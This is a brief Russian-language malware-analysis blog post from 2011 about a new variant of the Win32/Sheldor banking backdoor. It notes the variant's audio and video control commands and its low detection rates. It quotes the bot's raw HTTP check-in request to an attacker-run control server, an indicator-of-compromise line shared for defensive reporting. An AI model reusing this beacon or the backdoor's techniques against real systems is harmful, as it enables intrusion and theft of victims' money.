понедельник, 24 января 2011 г.

Win32/Sheldor - теперь малиновый ...

Недавно уже писал про семейство Win32/Sheldor и вот на днях граждане порадовали другой версией Win32/Sheldor.E (VT) с двумя интересными командами:


StartAudio/StopAudio

StartVidio/StopVidio (да да, именно так и было написано :))

Я думаю всем понятно, что просто посылается сообщение оконной функции и таким образом эмулируется активация необходимого элемента управления.

И еще кстати поменялась админка:
GET /tt/getinfo.php?id=414034883&pwd=7777&stat=1 HTTP/1.1
User-Agent: x3
Host: setrakimaki.com


Win32/Sheldor хоть и прост по всем параметрам, но новые экземпляры имеют достаточно низкий детект и как правило это чьи-нибудь параноидальные эвристики. Уже зафиксировано только нами (ESET+GIB) несколько инцидентов увода денег именно при помощи этого бэкдора.